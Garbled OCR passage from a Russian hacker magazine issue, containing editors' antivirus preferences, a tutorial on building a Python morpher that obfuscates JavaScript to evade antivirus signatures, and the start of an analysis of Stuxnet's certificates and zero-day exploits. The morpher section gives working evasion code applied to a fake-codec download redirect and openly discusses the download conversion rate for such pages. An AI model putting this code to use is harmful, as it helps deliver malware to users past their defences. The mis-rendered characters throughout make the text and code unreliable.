менные 64-разрядные версии осей. 

2 . У меня дома валяется много разных 
коробок: КІ8, Ог. ѴѴеЬ, І\ІосІ32, 8утап1:ес. 
Одну из таких коробоки подарил бы. Если 
бы не было — поставил бы бесплатный 
АѵазЕ 

3. Меня тут сложно удивить, но мне 
понравиласьсІоисІ-концепцияу8уппап1:ес: 
пару лет назад они были реальными 
пионерами втаком подходе, и он мне очень 
понравился просто с концептуальной 
точки зрения. Сейчас эту технологию уже 
используют многие производители, но 
именно 8утап1:ес меня в свое время этим 
порадовал. 



СТЕПАН «ЗТЕР» ИЛЬИН, 
РЕДАКТОР РС20ИЕ И Ш 

На всетри вопроса ответ один: Кіогіоп I пТегпеТ 




Весигііу. Установил год назад и с тех пор о 
его существовании практически не вспоми- 
наю. Авер работает в режиме «ІсІІе Мобе»и 
включаетсканирование втотмомент, когда за 
компьютером никто не работает. Задумался 
сейчас: «А проверяетли он вообще что-ни- 
будь?». Посмотрел логи — исправно работает, 
гад :). Тут надо сказать, что я начал исполь- 
зовать его совершенно случайно. Коробку с 
антивирусом подарили в Зутапіес и расска- 
зали о новых функциях, реализованныхчерез 
облако. «Облачные вычисления»оказались 
не маркетинговой фигней, приплетенной для 
красного словца. Авер действительно ак- 
тивно запраши вает информацию с серверов 
компании. «Пришли мне результат проверки 
ехе’шника ста ким-то хешем», «Хочуузнать.у 
скольких пользователей в системе естьтакой- 
то файл?» и т.д. Скажем, скачав файл из Сети, 
ты сразу видишь предварительный результат 
его сканирования: если его загрузили сотни 
людей и базе авера неизвестно, что кто-то из 
них заразился, то ему можно доверять. Подход 
реально работает и работаетхорошо. Я даже 
снифал трафик, была идея проспуфить запро- 
сы и ответ сервера —увы, ничего не вышло. Но 
стех пор антивирусу меня надежно прижился. 
И активныхзаражений системы, конечно, не 
было. 




в ДМИТРИИДОКУЧАЕВ, 

РЕДАКТОР РУБРИКИ «ВЗЛОМ» 



1. Дома использую Касперского. Несмотря на 
его неповоротливость и прожорливость, он 
мне очень нравится. Особенно кайфую отего 
компонентов «антибаннер» (режет баннеры 
и ссылки) и «доверенная среда», где можно 



протестировать какую-нибудь подозритель- 
ную заразу :). Ну и ІМ-фильтр, после установки 
которого меня перестали спамить авториза- 
ционными запросами елевыми ссылками. 
Раньше использовал Ог.ѴѴеЬ, но как-то раз он 
меня очень подвел, и я на него обиделся. 

2 . Ог.ѴѴеЬ однозначно. Он простой и непри- 
хотливый. Ктомуже имеет неплохой 8рубег- 
модуль, который сканитфайлы налету. Ну и 
незамысловатый сканер, запустить который 
можетлюбая блондинка. 

3. Не помнютаких :). Скажулишь, что впе- 
чатлила 1 0 версия КІ8. Сначала испугался 
ее громоздкости, но потом понял, что все 
компоненты реально нужные и интересные. 

В итоге какподсел на КІ8 год назад, такего и 
использую. 




НИКОЛАЙ АНДРЕЕВ, 
(АЮЩИИРЕДШ"' 



ВЫПУСКАЮЩИМ РЕДАКТОР X 



1. На виндовой машинеустановлен МісгобоТі 
ВесигіІуЁззепбаІз, ноя не могу сказать, что я 
его прямо-таки использую. У меня вообще нет 
большой необходимости в антивирусе. Для 
серфа преимущественно используется мак, 
домашняя сеть надежно защищена, а винда 
соответствующе настроена. Зловреды как-то 
не лезут, наверное, просто неоткуда. 

2» Бесплатное что-нибудь: авиру, аваст, АѴ6, 
ну или тотже Еззепбаіз. Если случай запущен- 
ный, пришел бы с комплектом руткит- хантеров 
и анхукеров, чтобы оценить угрозу, а дальше 
или руками бы почистил, или клинер скачал. 

3. По-моему, ни один ничем особенно не 
запомнился. 



►076 
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Ж АЛЕКСАНДР ЛОЗОВСКИЙ, 
РЕДАКТОР РУБРИКИ «МАЬѴѴАРЕ» 



1. Когда как: КІ5201 1 или Ог.ѴѴеЬ на рабочем 
компьютере, на ноутбуке — Аѵазі!. КІ5 радует 
функционалом (о котором уже неплохо вы- 
сказался Форб, только ты не подумай, что мы 
у него списывали :)), Ог.ѴѴеЬ вызывает подсо- 
знательное доверие стех пор, какв конце 90-х 
исцелил мой компьютер от ОпеНаІІ. Стех пор 
я, правда, ничем особенно и незаражался. 
Кстати, не соглашусь с Форбом насчет вебов- 
ского сканера: по-моему, весьма странная 
вещь — после выбора в контекстном меню ля 
какого-нибудь файла опции «сканировать» 
вылезаеттормозное окно сканера и начинает 
долго-долго соображать. 

2 . Аѵазі;! Причин несколько. Он бесплатный, 
но при этом недостает рекламой и предло- 
жениями апгрэйдиться до платной версии. 

Он красиво выглядит, не напрягаетникакими 
сложными вопросами, просто периодически 
показываетсвое карамельное окошечко, от 
которого любой девушке становится приятно 
и спокойно: «Все под контролем, я обновился, 
я всех победил и от вас никаких действий 

не требуется». Да и с вирусами он вроде бы 
неплохо борется. 

3. Сотобо. По-моему, единственный в своем 
роде бесплатный комплекс Іпіегпеі Зесигііу с 
бесплатным антивирусом, файерволом и сэн- 
дбоксом. Нето что бы я был любителем халявы 
:), но бесплатный функционал всегда радует. 
Антивирус в нем кажется не очень мощным, 
но, думаю, это искупается крутым файрволом 

и сэндбоксом, в который он сует все, что у него 
вызываетхотя бы минимальное подозрение. 




1. Я остановился на нетребовательном к 
системным ресурсам Езеі Ыоб32. Чтобы 
подстраховаться, периодически выпол- 
няю проверки с помощью сканера Ог.ѴѴеЬ 
Сигеіі! Для меня эта связка — наименьшее 
из зол. 

На работе использую самые разные конфи- 
гурации. Например, в одной компании: 

•на интернет-шлюзе (под управлением 
ѴѴі п2кЗг2) — Кегіо ѴѴіпРоиІе Рігеѵѵаіі с 
модулем МсАІее для проверки трафика «на 
лету»; 

• на почтовом сервере (ОрепВЗО) — ЗратсІ 
(в режиме дгеуіізііпд) + Зепбтаіі (с само- 
писными правилами против некоторых 
видов червей) + СІатаѵ+ Ргостаіі (окон- 
чательная фильтрация, раскладывание по 
папкам МаіШіг); 

• на рабочих станциях (ѴѴіпХР) — Езеі ІМосШ 
+ Ог.ѴѴеЬ Сигеіі! + Казрегзку Ѵігиз Ретоѵаі 
ТооІ+ МаІѵѵагеВуІез Апіі-таіѵѵаге + АѴ2 (в 
тяжелых случаях) + Ог.ѴѴеЬ ЫѵеСО (если 
комп не загружается даже в безопасном 
режиме) + АсгопізТгие Ітаде ВооЮй (если 
некогда/лениво разбираться в проблеме). 

2 . На комп подруги водрузил все тот же 

N осІ32, поскольку он обладает интуитивно 
понятным интерфейсом и проств исполь- 
зовании. А приватный сервер обновлений 
решает проблему актуальности базы вирус- 
ных сигнатур. 

3. С ответом на этот вопрос Андрей не 
справился. Он утомился от предыдущих 
двух вопросов, поэтому единственное, 
что я от него услышал, был вот этот поток 



сознания: «Последнее, с чем возился: на 
опенке настраивал проверку веб-трафика 
средствами здиіб (в режиме прозрачного 
прокси), Ьаѵр и сіатаѵ. Даже при неболь- 
шой нагрузке эта конструкция была неус- 
тойчивой: то сіатаѵ вел себя неадекватно 
то Ьаѵр сваливался в кору. Причем в Ыпих 
с аналогичными конфигами все работало. 
Такие дела». 




І0ЕЕ0ШІ 

ГЛАВНЫЙ КРАШ-. 



ЛАБОРАНТ X 



1. Дома использую Аѵазі Егее Апііѵігиз. Он 
легкий, не тормозит систему, да и вирусы 
иногда находит. Очень нравится фича скана 
при загрузке системы. Если соблюдать тех- 
нику безопасности и думать, то Аваст пре- 
красно справляется со своими задачами. 

2 . Как ни странно, тоже Аваст. Во-первых, 
его интерфейс полностью переведен на рус- 
ский язык. Во-вторых, он не задает глупых 
вопросов, когда находит вирус, а просто 
блокирует его и кладет в карантин. В-треть- 
их, зарегистрировать его очень просто: не 
надо копировать никаких ключей, сохранять 
файлики и т.д. Просто заполняется форма с 
личными данными и жмется кнопка «Ок». 

3. В свое время присматривался кАѵіга 
АпІіѴіг. Есть бесплатная версия для домаш- 
него пользования и, по отзывам, неплохо 
находит зловредов. Еще показался инте- 
ресным ВіШеІепсІег, в первую очередь из-за 
своей мега-параноидальной (вхорошем 
смысле слова) эвристики. 



ВНЕ КОНКУРСА 



Л ИЛЬЯ ШАБАНОВ, 

УПРАВЛЯЮЩИМ 

ПАРТНЕР 

АМТІ-МАІЖКЕ.КІІ 

1. Все мои компьютеры работают 
под управлением ѴѴіпсІоѵѵз 7 х64, 
все ПО на которой аккуратно и 
своевременно обновляется, поэ- 
томутребования кантивирусной 
защите несколько снижаются. 

В настоящее время основной 
компьютер защищен Місгозоіі 
Зесигііу Еззепііаіз, на втором сто- 
ит Аѵазі 5 Егее Апіі-ѵігиз. Вообще, 
в силусвоего занятия не могу 
отдать предпочтение какому-то 
одномуантивирусу, постоянно их 
меняю и тестирую. 

2 . Меня часто просят посовето- 
вать антивирус. Для этого я выяс- 
няютри вещи: какая ОС использу- 



ется, готов ли человек платить за 
лицензию, и какие функции кроме 
антивируса еще нужны. Если 
человек не готов платить, то ре- 
комендую бесплатные продукты, 
например, Місгозоіі, Аѵазі и Аѵіга. 
Если же есть готовность платить 
за более надежную, качественную 
и комплексную защиту, особенно 
если речь идето защите старой 
ѴѴіпсІоѵѵзХР.то рекомендую 
приобрести хороший комплекс- 
ный продукт, такой как Казрегзку 
Іпіегпеі Зесигііу, Кіогіоп Іпіегпеі 
Зесигііуи ВіЮеІепсІег Іпіегпеі 
Зесигііу. 

3. Я верю в облачныетехнологии, 
которые в ближайшие несколько 
лет полностью изменят работу ан- 
тивирусных продуктов. Те вендо- 
ры, которыеуже вовсю развивают 



свои «облака», собирают стати сти- 
ку репутации файлов, веб-адресов 
и почтовых сообщений, уже имеют 
и будут иметь неоспоримое пре- 
имущество по скорости реакции 
на новейшиеугрозы. В настоящее 
время облачные репутационные 
технологии применяются в пер- 
сональных продуктах от «Лабо- 
ратории Касперского», Зутапіес 
(Кіогіоп), Місгозоіі, Аѵазі и Рапба. 
Реализация и глубина примени- 
мости у всех вендоров пока раз- 
ная, но общий тренд на освоение 
огромной статистической базы, 
поступающей от пользователей, 
вполне очевиден. В целом техно- 
логически очень привлекательно 
выглядят почти все «комбайны» 
классов I піегпеі Зесигііу и Тоіаі 
Зесигііу от ведущих производите- 



лей (продукты премиум-класса). 
Пожалуй, там уже есть все (и даже 
больше) для обеспечения безо- 
пасности компьютера и личных 
данных: резервное копирование, 
шифрованиеданных, родитель- 
ский контроль, менеджер паролей, 
оптимизация работы ПК и 
многое другое. При этом цена 
этих решений при постоянном 
наращивании функционала ос- 
тается прежней, то есть все это 
пользователь, по сути, получает 
в виде бонуса. Больше всего 
изданного класса мнелично 
симпатичен Кіогіоп 360 — насто- 
ящий премиум-продукт, который 
совмещает в себе нетолько 
функции защиты самого ПК, но и 
его поддержания в оптимальном 
рабочем состоянии, ш 
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.ІШРФЕР ПРОТИВ 
ТЬМЫ СИГНАТУРНОМ 



Создаем гениально простой морфер на РуІНоп’е 

ѳАнтивирусное зло растет и ширится с каждым днем. Оно вовсю 
проникает в браузеры пользователей, препятствуя проникновению 
света правды на компьютеры ушастых юзеров. Что же делать? 
Способ есть! 



О созданиях темной стороны силы 

Веб-модуль Антивирусов Тьмы сегодня зачастую работает на двух 
уровнях — на сетевом и на уровне браузера. Первый уровень — это 
когда антивирус пропускает весьтрафик на 80 порту через свои 
сигнатуры. Обход этого возможен через простое шифрование 
ЧаѵаЗсгірКа тем жеХОП’ом. Второй уровень работаетчерез встраива- 
ниетулбаров во всебраузеры. Это дает возможность Тьме посылать 
на сигнатурный анализ ОаѵаЭсгірІ после окончания его расшифровки 
в браузере и делает криптование бесполезным. Наиболее опасный 
тулбар антивирей — в Іпіегпеі Ехріогег’е, поскольку он дает полный 
контроль над страницей. Крометого, ко второмууровню относится 
эмуляция запуска скрипта внутри антивируса, но она на данный 
момент настолько примитивна и бажна, что мы о ней даже не будем 
разговаривать. 

Для обхода обоих уровней нам нужно всего лишь каждый раз гене- 
рить достаточноуникальный .^ѵаЭсгірІ (ага, Капитан Очевидность). 
Именно это наш написанный морфер и будет делать :). 



Начало войны 

Чтобы написать свой морфер, мне пришлось перерыть много, очень 
много аналогов. Среди них были и слабые, которые лишьхексили 
строки... И были сильные, применяющие много разнообразных 
фишек криптования и морфи рования, изменяющие скрипт до неуз- 
наваемости. Но в то же время они существенно увеличивали размер 
^ѵаЭсгірКа и при этом сильнотормозили его работу. 

Применение первых в промышленных масштабах чревато быстрым 
«устареванием» морфера, в результате чего через неделю он уже не 
сможет сбивать сигнатуры. Вторые же из-за размера итормознутос- 
ти настолько снижают«конверт» (соотношения тех, кто просмотрел 
видеоролик, ктем, кто скачал кодек к нему), что их использование 
становится полностью нецелесообразно. 

Мыже сделаем морфер достаточно рандомизирующий, почти не 
увеличивающий размер и не снижающий быстродействия. Кстати, 
перед прочтением нижеследующего те кета я советую тебе немного 
отвлечься и прочитать врезку «Принцип работы морфера». 
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Тгіаі-Кезеі’ — гениальное изобретение 
человечества 

Для наглядности возьмем пример іаѵаЭсгірГа, который 
будем по ходу статьи морфировать: 

<зсгірЦ> 

іипсСіоп до_со<іес ( ) 

{ 

ІосаЦіоп.Цгеі = "ЬССр : //зегѵег/сосіес . ехе" ; 

} 




" Уо&#117 ; сіоп ' С Ьаѵ&#101 ; со&#100 ; е&#99 ; 
іо&#1 14 ; ѵі<іе&#111 ; " . 



Поскольку буквы заменяются случайным образом, сиг- 
натуру на них не изобретешь. Улучшить морфирование 
можно, периодически разделяя строку символом «+» и 
используя Бігіпд.ІтотСЬагСосІе (код): 

ѵагу а = "со" + "сіе" + ЗСгіпд . ІготСЬагСосІе ( 69 ) 
+ "с" ; 

Функции Добра 

Следующим лакомым кусочком для антивирей (после 
строк) идут названия переменных и функций. 

Посмотри на наш примерный іаѵаЭсгірІ:, там же все рав- 
но будет называться функция до_собес. Главное, чтобы 
во всемтексте мы изменили еезначение на другое. Ина- 
че говоря, наша задача — написать функцию, которая бы 
принимала строку конкретную и вместо нее возвращала 
строку случайную. Причем, если мы уже сгенерировали, 
например, для до_собес что-то типа ЗОсізсізѴѴ, то теперь 
везде нужно заменять до_собес именно на это значе- 
ние — БйсІзсІзѴѴ. Для хранения состояний переменных 
объявим объекте одной переменной словарем: 

сіазз С(оЬ^есЦ) : 
гапсі_ѵаг = { } 

Это будет наше глобальное хранилище. Теперь функция 
замены имен переменных выглядит приблизительно 
так: 



сіеі гапс!_ѵаг (ѵаг) : 

іі ѵаг іп С.гапс1_ѵаг: 

геСигп С . гапс!_ѵаг [ѵаг] 



ѵаг шеззаде = "Уои сіоп'Ц Ьаѵе сосіес іог ѵісіео" ; 
аІегЦ (шеззаде) ; 

зеСТішеоиЦ ( до_сос1ес ( ) , 1000) ; 

</зсгірЦ> 

Морфо-строки 

Первыми на крючокТьмы попадают строки. Простейший 
способ их морфирования заключается в случайной замене 
символов на Ьех-эквиваленты. Напишем на Руібоп функ- 
цию, которая примет строку и возвратитеезаморфирован- 
ный вариант: 

ішрогЦ гапсіош 

ігогп зСгіпд ішрогЦ ІеЫіегз 

(Іеі шогі_ЬЦш1_зЦгіпд (ЬСшІ) : 
гег = ' ' 
іог з іп ЬЦшІ : 

іі з іп ІеССегз апсі гапсіош. сію і се ( [Тгие, 
Раізе, Раізе, Раізе] ) : 
гег += " &#%з ; " % огсі(з) 
еізе : 
гег += з 
геіигп гег 

Функция перебирает все символы, и если это буква (іп 
Іеиегз), то с вероятностью 25% она заменяется Ьех-пред- 
ставлением. К примеру, из буквы «а» получится a.А 
из «Уои сіопЧ Ьаѵе собес Гэг ѵісіео» получится что-то такое: 



С . гапсі_ѵаг [ѵаг] = депега!е_з1гіпд ( 5 , 10) 
геіигп С . гапсі_ѵаг [ѵаг] 

В ней идет проверка; если строка есть в глобальном 
представлении, то функция возвратитзначение оттуда. 
Если нет, сгенерирует случайную строку длиной от 5 до 
Юсимволов, а результат сохранит в глобальной пере- 
менной для будущего использования. 

Кстати, я же еще пропустил описание функции депега!:е_ 
зігіпд! Вотона: 

сіе! депега!е_з!гіпд ( з!аг1=5 , еп<і=7) : 

г = ' ' 

іог _ іп хгапде ( гапсіош . гапсігапде ( 
зіагі , епсі) ) : 

г += гапсіот. сіюісе ( Іеііегз) 
геіигп г 

И последний нужный элемент морфера — это генерация 
мусора, нужного, чтобы разбавить полезные конструк- 
ции случайными переменными, циклами или условиями. 
Давай придумаем какие-то три мусорные конструкции. 
Мне нравятся такие: 

ѵаг Ъ= " ааа " ; 

іі ( " аааа" == " зсізсізсі" ) азсіазсіаз ( ) ; 
іипсііоп зізі ( ) { } ; 

Для каждой из этих мусорных конструкций нужно напи- 
сать функцию с именем деІ_еІ_номер, что-то типа такого: 




> дѵд 



• На нашем диске 
найдешь исходники 
морфера, тестиру- 
емый баѵаЗсгі рі и 
парочку примеров 
морфированного 
варианта. 

• Не пропусти на дис- 
ке видео, в котором мы 
тестируем использо- 
вание написанного 
скрипта. 




> ѵѵагпіпд 

• Информация 
в статье 
представлена 

в исключительно 
образовательных 
целях. 

• Написание 
морфера — 
небанальная вещь 
благодаря Касперу 
с его тулбаром 

в I піегпеі: Ехріогег’е. 
Эта связка не раз 
заставляла мои 
мозги закипать. 

Хоть я и противник 
Каспера за его 
тормознутость, но 
разработчики веб- 
модуля — умные 
ребята. Респект им :]. 
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МАШАВЕ 



сІеТ деЪ_е1_1 ( ) : 

геЪшгп "ѵаг %з= 1 %з ' ; " % ( 

депегаЪе_з1ігіпд (4,6) 
депегаЪе_з1ігіпд (4,6) 



Функция замусоривания должна выбрать любую конструкцию (деі 
еІ_1 , деІ_еІ_2 или деІ_еІ_3) и возвратить ее результат: 

<іе€ гап<5ош_т з_е1ешепЦ ( ) : 
сіеТ деЪ_е1_1 ( ) : 

геСигп "ѵаг %з= ' %з ' ; " % ( 

депегаЪе_зЪгіпд ( ) , 
депегаСе_з1ігіпд ( ) 



сіеТ деЪ_е1_2 ( ) : 

геЪигп " О. ( ' %з ' == ' %з ' ) %з ( ) ; " % ( 

депегаСе_зЦгіпд ( ) , 
депегаЪе_зЪгіпд ( ) , 
депегаЪе_зЪгіпд ( ) 

) ; 

сІеТ деЪ_е1_3 ( ) : 

геЪигп " РипсЪіоп %з ( ) { } " % ( 

депегаСе_зЦгіпд ( ) ) 




А от свиного гриппа так ни один антивирус нас 
и не уберег 

Ргот Ъогпасіо . ЪетрІаЪе ітрогЪ ТетрІаЪе 
Ъетр1аЪе_бз = " оиг_ехатр1е_Ьетр1аЦе " 

33 = ТетрІаСе (Цетр1аЦе_з з ) . депегаЪе( 
гапсі_ѵаг=гапс1_ѵаг , 

тогР_ПЦт1_зЪгіпд=тог:І:_ТШт1_зЦгіпд , 
гапсіош_з з_е1етепЦ=гапсіот_з з_е1етепЪ 

) 



Рпс = " деЪ_е1_%з " %гапсіот. гапсігапде ( 1 , 4 ) 
геСигп ІосаІзО [Рпс] () 

Здесь все ясно, кроме собственно момента выбора. Для этого в 
предпоследней строке мы генерируем имя внутренней функции, а в 
последней — вызываем выбранную функцию через обращение к ней 
из массива всехлокальных переменных ІосаІзО. 

Чтобы посмотреть, какие мусорные конструкции мы получили, вызо- 
вем ее несколько раз: 



Здесь мы генерируем из шаблона (переменная ІеплрІаІеДз) мор- 
фированный баѵаЗсгірІ:, передавая во внутренности шаблонизато- 
ра (объект Тетріаіе) написанные функции морфи рования. 

Теперь преобразуем начальный 35 в шаблон для морфера. В 
Тотабо-шаблонах функции вызываются из двойных фигурных 
скобок. Воттакой шаблон получился: 

<ЗСГІрЦ> 

{ { гапсіот_з з_е1етепЪ ( ) } } 



»> гапс!от_з з_е1етепЪ ( ) 

1 РипсЪіоп аЕгРЗА ( ) { } ' 

»> гапс!от_з з_е1етепЪ ( ) 

"ІР ( ' иНзЛ ' == ' УѵЕѵ\ЛШЦЪЪа ' ) рхОсіНззсІ ( ) ; " 

»> гапсіот_з з_е1етепЪ ( ) 

"ѵаг угЗ€зсідЗ= ' ОумЕСѵд ' ; " 

Согласись, что сложно будет среди этого мусора найти полезный 
код. 

В принципе, на этом программирование морфера почти закончи- 
лось. Нам остается лишь все это объединить. А для этого мы вос- 
пользуемся Тетріаіе-движком из веб-фреймворка ТогпабоѴѴеЬ. 



Принцип работы морфера 



Самое сложное в написании морфера — это разбор исходного 
баѵаЗсгірЕа. Это нетривиальная задача, для решения которой 
понадобятся отличные знания хотя бы простейших автоматов. 

В нашем морфере, чтобы убрать сложный этап синтаксического 
разбора, мы будем вручную маркировать исходный ЭаѵаЗсгі рі 
приблизительно так: 

{ { вставим мусорную конструкцию } } 

ѵаг а = " { { заморфировать строку ( "Привет Мир" ) } } " 

В результате наш морфер, по сути, будет просто вызывать нуж- 
ные функции лишь в указанных местах. 



РипсЪіоп {{ гап<б_ѵаг ( " до_сос!ес " ) }}(){ 

ІосаРіоп . Ьге^ = " { { шог^_ПЦш1_зЦгіпд ( "ЬЪЪр : // 



Используемые функции Руйіоп'а 



Из модуля гапбот мы использовали функции гапбгапде и 
сбоісе. Первая выбирает случайное число, которое больше или 
равно зіагі: и меньше зіор: 

гапсіот. гапсігапде ( зСагС , зСор) 

Вторая выбирает случайный элемент из входного списка. Эту 
конструкцию в морфере мы использовали, когда нужно было с 
какой-то вероятностью выполнить действие. К примеру, напе- 
чатаем строку с вероятностью 33%: 

; ІП гапсіот . сЬоісе ( [Тгие , Раізе, Раізе]): 
ргіпС "33 .33333%" 

Из модуля зігіпд мы импортировали список всех алфавитных 
символов для генерации случайных названий: 

Ргот зЪгіпд ітрогР ІеЪЪегз 
I »> ІеЪЪегз 

' АВСВЕРСНІ ЦКЬШОРОКЗТЦѴМХУгаЪссіеРдЪі б кІшпордгзЪи 
ѵѵгхут,' 

Если у тебя в ІеНегз есть русские буквы (зависит от настроек], 
то лучше используй модуль азсіЦ-еІТегз — в нем лишь англий- 
ские буквы. 



Таким образом, морфер получится простым и надежным. 

► 080 
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Как видишь, тутя понаставил несколько вызовов 
функций генерации мусора {{ гапсІоіт^5_е1.етепШ }} 

(на практике их нужно побольше). Крометого, каж- 
дую переменную и функцию я заключил в гапсІ_ѵаг - {{ 
гапсІ_ѵаг("до_сосІес") }}. А все использованные строки 
заморфировал {{ тогНіІтІ_5Ыпд[ м Ьир://5егѵег/сосІес. 
ехе") }}. 

И вечный здв„ 
на вечный бои 

Одно из преимуществ такого типа морфера — легкость 
расширения функционала, что очень поможетзлобно- 
му кодеру в его экспериментах. В качестве примера 



Хозяйке на заметку 



Если антивирус повесил сигнатуру на вызов сис- 
темной функции, которую сложно заморфировать, то 
вместо такой конструкции: 

ІосаЕіоп . ЕшеЕ = "ЬЕЕр: //сосіес/сосіес . ехе" ; 
Можно использовать: 
ѵаг а = ІосаЕіоп; 

а.ЬгеЕ = "11ЕЕр://сосіес/со(іес.еxе ,, ; 
арЕ" , + , 'геЕ г ] = " ЬЕ Ер : //сосіес/сосіес . ехе" ; 

Или, на языке нашего морфера: 

ѵаг {{ гапсі_ѵаг ( " ІосаЕіоп" ) }} = ІосаЕіоп; 

{ { гапс!_ѵаг ( " ІосаЕіоп" ) }}["{{ тогЕ_Ь.Еті_ 
зЕгіпд ( "ЬгеЕ" ) } } " ] = " { { тогЕ_1лЕт1_ 
зЕгіпд ( "ЬЕЕр: //сосіес/сосіес . ехе" ) }}"; 



Хозяйке на заметку, дубль 2 



В статье специально не употребляются сложные 
конструкции из Руібоп’а. Например, есть в модуле 
соііесбопз специальный словарь сіе^аиіісіісі, кото- 
рый сократил бы написанную функцию гапб_ѵаг. 

В беіаиіісіісі: при инициализации нужно передать 
функцию генерации начального названия. Далее он 
используется как обычный словарь: 

»> а = ЛеЕаиІЕсіісЕ (депегаЕе_зЕгіпд) 

>» а [ " до_сосіес " ] 
сідОЗбѵ/ 

»> а [ " ІосаЕіоп" ] 

ЕсізЕЕЕ 

>» а [ " до_сосіес " ] 
сідОЗЕм 



Крутой у кого-то файрфокс со встроенным 
антивирусом :) 

расширения можно привести возможность вставлять 
случайное количество ЧаѵаЗсгірІ-пустышек: 

ЛеЕ тапу_гапсіот^ з ( зЕагЕ=0 , зЕор=5) : 
гег = " " 

Ног _ іп хгапде (гапсіот. гапсігапде ( 
зЕагЕ , зЕор) ) : 
гег += гапсіот_з з_е1ешепЕ ( ) 
геЕигп гег 

Все это хозяйствотеперь можно размещать в шаблонах 
— {{ тапу_гапсІоітщІ5() }}. 

Базовый функционал морфера закончен. Его плюсы: 
простота, небольшой размер заморфированного кода, 
легкость расширения. Но и минусы не обошли стороной, 
вернее, один минус — ЧаѵаЗсгірІ-шаблон нужно созда- 
вать самим. Правда, создавать его нам надо однократно, 
та к что это — проблема небольшая. 

Кстати, ты ведь понял, что написанный морфер нельзя 
использовать в противозаконных целях? Лично мы ни- 
чего такого не планировали итебе не советуем. Мы чтим 
уголовный кодекс, а поэтому морфер этот мы используем 
для сбивания сигнатур с видеохостинга с «неизвестным 
кодеком». До скорой встречи. 

Р5: Спасибо большое жене Александре, которая не кор- 
мила меня до тех пор, пока я не сдал Лозовскому статью! 
(По-моему, это Лозовскому надо сказать спасибо зато, 
что он стимулировал вас всех... Короче, просто всем спа- 
сибо и всех с Новым годом, — прим. Лозовского) :). □С 




[ НТТР://ѴШѴѴ 

I Г 

> Ііпкз 

• Чтобы расширить 
свой морфер, бери 
идеи из аналогов: 

• ИЛрУ/сІеѵеІорег. 
ѵабоо.сот/ѵиі/сот- 
ргеззог/ 

• ЬЛр://собе.доод[е. 
сот/сіозиге/сот- 
рііег/ 

• ЬирУ^зсгатЫег. 
сот/ 

• ЫірѴ^аѵазсгірІоЬ- 
Іизсаіог.сот/ 

• ЬЛрУ/ѵѵѵѵѵѵ.зіиппіх. 
сот/ргосі/щ/ 

• ЬирУ/ѵѵѵѵѵѵ.сгоск- 
Ьгб.сот^аѵазсгірі/ 
]зтіп.Ы:т[ 

• ЬирУ/ѵѵѵѵѵѵ.сІаЛ- 
Іодіс.сот/рго]ес1:5- 
опііпе^аѵазсгірі:- 
оЫизсаІог.Ыт 



• Дока по 
ТогпабоѴѴеЬ- 
шаблонизаторе, 
который мы 
использовали — 

• ЬЛрУ/ѵѵѵѵѵѵЧогпасІ- 
оѵѵеЬ.огд/ 



Последнее время ЮЕ для РуНіоп РуСЬагт очень радует. 
Советую попробовать 




ХАКЕР 01 (144) 201 1 



► 08і 






7 



МАШ АРЕ 



| Матросов Александр, руководитель Центра вирусных исследований и аналитики российского представительства Е5ЕТ, ѵѵѵѵѵѵ.іѵѵіиег.сот/таігозоѵі 
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Современные вредоносные программы все реже и реже содержат в 
себе оригинальные идеи и технологические ухищрения, ведь основная 
их цель - зарабатывание денегоаименьшими вложениями. Тем не 
менее, время от времени появляются высокотехнологичные примеры 
киберпреступных творений, которые потом еще долго будоражатумы 
вирусных аналитиков. Вот и 2010 год не стал исключением, явив нам 
новый виток эволюции вредоносных программ. 
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Зіихпеі 

Об этом черве можно говорить долго — он по праву получил зва- 
ние самой технологичной вредоносной программы за все время 
существования этих вредоносных особей. Дело в том, что Біихпеі 
использовал целый набор интересных технологических находок, 
сконцентрированных в одной вредоносной программе. С точки 
зрения финансовых затрат своих создателей он тоже лидирует в 
нашем рейтинге — чего стоит один только набор используемых уяз 
вимостей нулевого дня. Итак, обо всем по порядку. 

Легальные сертификаты 

Ряд компонентов червя Біихпеі (в том числе и драйверы) 
имели легальные цифровые подписи. Это позволяло беспре- 
пятственно обойти ряд НІРБ-систем, а в некоторых случаях 

— избежать обнаружения антивирусным монитором или скане- 
ром. Сертификаты, которые были использованы, принадлежа- 
ли таким компаниям, как Реаііек и ЛЧісгоп. А самое главное 

— предоставляли возможность подписи исполняемых модулей 
без отправки их на верификацию в МісгозоД, что позволило 
беспрепятственно подписать драйверы, использующие руткит- 
технологии. Как же так? Ведь весь процесс подписания драйве- 
ров контролирует сама МБ! Все верно, но существует возмож- 
ность получения от МБ цифрового сертификата, позволяющего 
на своей стороне осуществлять процедуру подписи. Например, 
для компаний, занимающихся разработкой железа, это доволь- 
но приятная опция. Вот и в нашем случае были использованы 
именно такие сертификаты. 

Конечно, создатели Біихпеі не одиноки в своем желании исполь- 
зовать легальные цифровые сертификаты для подписи вредонос- 
ных компонентов. Но чаще всего мы имеем дело с сертификатами 
какой-нибудь малоизвестной китайской компании дядюшки Ляо, 
которая специально была создана для получения легального сер- 
тификата и последующей его перепродажи, а здесь, сам понима- 
ешь, случай несколько иной. 

0-сІау вектора распространения и атаки 

Использование сразу шести уязвимостей в одной вредоносной 
программе, пять из которых являются уязвимостями нулевого дня 

— беспрецедентный по стоимости и количеству уязвимостей кли- 
нический случай. Интересным представителем этого набора явля- 
ется уязвимость М51 0-046, которая позволяла беспрепятственно 
распространяться через внешние носители, эксплуатируя уязви- 
мость в обработке І_І\ІК/РІР-файлов. 

Про эту уязвимость уже было много всего написано, поэтому я 
не буду заострять на ней внимание. Вектор распространения с 
использованием этой уязвимости был основным, но стоило червю 
проникнуть в локальный сегмент внутренней сети, как он начинал 
поиск жертв с использованием дополнительных векторов про- 
никновения. Которых в процессе исследования мы обнаружили 
достаточно МНОГО: 



ФАЙЛОВАЯ СИСТЕМА РУТКИТА 



ІСІІ 



соггіід.іпі 



Рііе іаЫе 



Последний блок 



ФАЙЛОВАЯ СИСТЕМА ТОІ.З 



М510-061 — уязвимость в сервисе Ргіпі Брооіег, которая позволяет 
удаленно выполнить произвольный код. Она была закрыта благо- 
даря своевременной реакции со стороны нескольких антивирусных 
компаний. 

М508-067 — да, это та самая уязвимость, используемая червем 
СопТіскег. Авторы зловреда также сочли нужным использовать этот 
вектор атаки. Кроме того, и здесь злокодеры проявили свои навыки 
и разработали достаточно интересный шеллкод, имеющий суще- 
ственные отличия оттого, что был использован червем Сопбскег и 
валяющегося в публичном доступе. 

Кроме всего прочего, Біихпеі не гнушается раскидыванием своего 
дропера по найденным сетевым шарам. В процессе запуска дро- 
пер проверяет множество различных параметров, но сейчас нас 
интересует тот факт, что этот зверь использует для повышения 
